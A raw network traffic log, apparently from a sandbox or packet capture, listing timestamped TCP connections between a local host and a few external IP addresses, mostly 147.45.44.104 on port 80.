Sep 27, 2024 00:15:14.438843966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438858986 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.438868999 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.438901901 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.439105988 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439120054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439133883 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439150095 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439163923 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439178944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439184904 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.439197063 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439213991 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.439239979 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.439239979 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.441345930 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:14.441368103 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:14.492785931 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.519948959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.519963026 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.519974947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520030975 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.520076036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520241976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520253897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520266056 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520277977 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520282984 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.520289898 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520303011 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520312071 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.520313978 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520330906 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.520347118 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.520570040 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520581961 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520592928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520603895 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520606995 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.520617008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.520627975 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.520654917 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521080017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521092892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521105051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521116972 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521128893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521138906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521151066 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521171093 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521193027 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521203995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521384954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521397114 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521413088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521425009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521435976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521446943 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521455050 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521462917 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521486998 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521505117 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521714926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521727085 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521739006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521749973 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521761894 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521764994 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521783113 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521852016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521863937 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521874905 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.521899939 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.521924019 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.522300005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.522310972 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.522322893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.522334099 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.522346973 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.522357941 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.522371054 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.522371054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.522387028 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.522413969 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.524327040 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524337053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524350882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524363041 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524374008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524390936 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.524415016 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.524477005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524491072 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524525881 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.524667025 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524677992 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524688959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524699926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524713993 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.524734974 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.524808884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524821997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524869919 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.524949074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524960995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524971962 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524982929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524995089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.524996996 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525005102 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525017023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525024891 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525028944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525041103 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525043964 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525072098 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525269032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525279999 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525290966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525302887 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525317907 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525345087 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525412083 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525423050 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525434017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525459051 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525476933 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525569916 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525580883 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525618076 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525773048 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525784016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525794029 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525804996 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525835037 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525851011 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.525959969 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.525973082 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526004076 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526010036 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.526015043 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526047945 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.526215076 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526226997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526237011 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526248932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526258945 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526269913 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526279926 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.526281118 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526321888 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.526540995 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526700974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526712894 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526726007 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.526818037 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.526839018 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527061939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527072906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527079105 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527082920 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527153969 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527211905 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527221918 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527232885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527265072 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527292013 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527416945 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527430058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527440071 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527456045 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527489901 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527525902 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527575016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527586937 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527596951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527606010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527617931 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527628899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527640104 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527650118 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527697086 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527889967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527901888 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527911901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527923107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527935028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527945042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527951956 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.527957916 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.527981043 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.528006077 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.528228045 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.528239965 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.528250933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.528280973 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.528778076 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:14.534733057 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:14.534835100 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:14.535037994 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:14.535037994 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:14.540978909 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:14.540990114 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:14.541112900 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:14.541122913 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:14.541292906 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:14.541304111 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:14.570785046 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.608092070 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608112097 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608202934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608216047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608227968 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608238935 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608251095 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608262062 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608273983 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608280897 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.608285904 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608345985 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.608355045 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608397007 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608408928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608419895 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608429909 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608441114 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.608448982 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608469963 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.608490944 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.608493090 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608520031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608527899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608530045 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608535051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.608563900 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.608839035 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609055042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609066963 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609077930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609116077 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.609169960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609183073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609344959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609357119 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609375954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609386921 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609394073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.609436989 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.609541893 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609554052 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609564066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609576941 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609608889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.609683990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609697104 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609708071 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609719992 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609730959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609740973 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.609743118 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609756947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609771013 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.609795094 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.609805107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.609817028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.610255003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.610301018 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.611279011 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611291885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611298084 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611303091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611310005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611315012 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611329079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611340046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611346960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611351967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611357927 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611366034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611372948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611377954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611392975 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611407042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.611515045 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.611545086 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.613234043 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613246918 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613256931 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613269091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613280058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613296032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613307953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613320112 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.613353968 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.613358974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613372087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613383055 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613394022 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613406897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.613414049 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.613431931 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.613946915 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.614029884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614042044 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614053011 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614064932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614077091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614088058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614099979 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614103079 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.614110947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614125013 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614135027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614141941 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.614146948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614160061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614171982 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614173889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.614228010 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.614238024 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.614664078 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614679098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614757061 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.614974976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.614989042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615000963 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615041971 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.615469933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615482092 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615494967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615541935 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.615645885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.615658998 CEST	80	49774	147.45.44.104	192.168.2.4
